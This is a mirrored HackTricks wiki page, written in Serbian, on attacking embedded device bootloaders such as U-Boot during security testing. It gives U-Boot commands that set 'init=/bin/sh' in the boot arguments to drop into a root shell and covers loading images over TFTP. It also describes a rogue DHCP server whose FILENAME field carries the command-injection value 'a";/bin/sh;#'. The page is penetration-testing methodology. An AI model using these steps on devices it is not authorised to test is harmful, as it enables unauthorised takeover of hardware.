mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
53 lines
2.4 KiB
Markdown
53 lines
2.4 KiB
Markdown
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
Preporučeni koraci za modifikaciju konfiguracija pokretanja uređaja i bootloader-a kao što je U-boot:
|
|
|
|
1. **Pristupite Bootloader-ovom Interpreter Shell-u**:
|
|
|
|
- Tokom pokretanja, pritisnite "0", razmak ili druge identifikovane "magične kodove" da biste pristupili bootloader-ovom interpreter shell-u.
|
|
|
|
2. **Modifikujte Boot Argumente**:
|
|
|
|
- Izvršite sledeće komande da dodate '`init=/bin/sh`' boot argumentima, omogućavajući izvršavanje shell komande:
|
|
%%%
|
|
#printenv
|
|
#setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh
|
|
#saveenv
|
|
#boot
|
|
%%%
|
|
|
|
3. **Postavite TFTP Server**:
|
|
|
|
- Konfigurišite TFTP server za učitavanje slika preko lokalne mreže:
|
|
%%%
|
|
#setenv ipaddr 192.168.2.2 #lokalna IP adresa uređaja
|
|
#setenv serverip 192.168.2.1 #IP adresa TFTP servera
|
|
#saveenv
|
|
#reset
|
|
#ping 192.168.2.1 #proverite pristup mreži
|
|
#tftp ${loadaddr} uImage-3.6.35 #loadaddr uzima adresu za učitavanje fajla i ime slike na TFTP serveru
|
|
%%%
|
|
|
|
4. **Iskoristite `ubootwrite.py`**:
|
|
|
|
- Koristite `ubootwrite.py` za pisanje U-boot slike i slanje modifikovanog firmvera za dobijanje root pristupa.
|
|
|
|
5. **Proverite Debug Funkcije**:
|
|
|
|
- Proverite da li su debug funkcije kao što su detaljno logovanje, učitavanje proizvoljnih kernela ili pokretanje sa nepouzdanih izvora omogućene.
|
|
|
|
6. **Opasna Hardverska Interferencija**:
|
|
|
|
- Budite oprezni prilikom povezivanja jednog pina na masu i interakcije sa SPI ili NAND flash čipovima tokom sekvence pokretanja uređaja, posebno pre nego što se kernel dekompresuje. Konsultujte tehnički list NAND flash čipa pre nego što kratko spojite pinove.
|
|
|
|
7. **Konfigurišite Rogue DHCP Server**:
|
|
- Postavite rogue DHCP server sa zlonamernim parametrima za uređaj da bi ga usvojio tokom PXE pokretanja. Iskoristite alate kao što je Metasploit-ov (MSF) DHCP pomoćni server. Modifikujte 'FILENAME' parametar sa komandama za injekciju kao što su `'a";/bin/sh;#'` da biste testirali validaciju unosa za procedure pokretanja uređaja.
|
|
|
|
**Napomena**: Koraci koji uključuju fizičku interakciju sa pinovima uređaja (\*označeni zvezdicama) treba da se pristupaju sa ekstremnim oprezom kako bi se izbeglo oštećenje uređaja.
|
|
|
|
## Reference
|
|
|
|
- [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|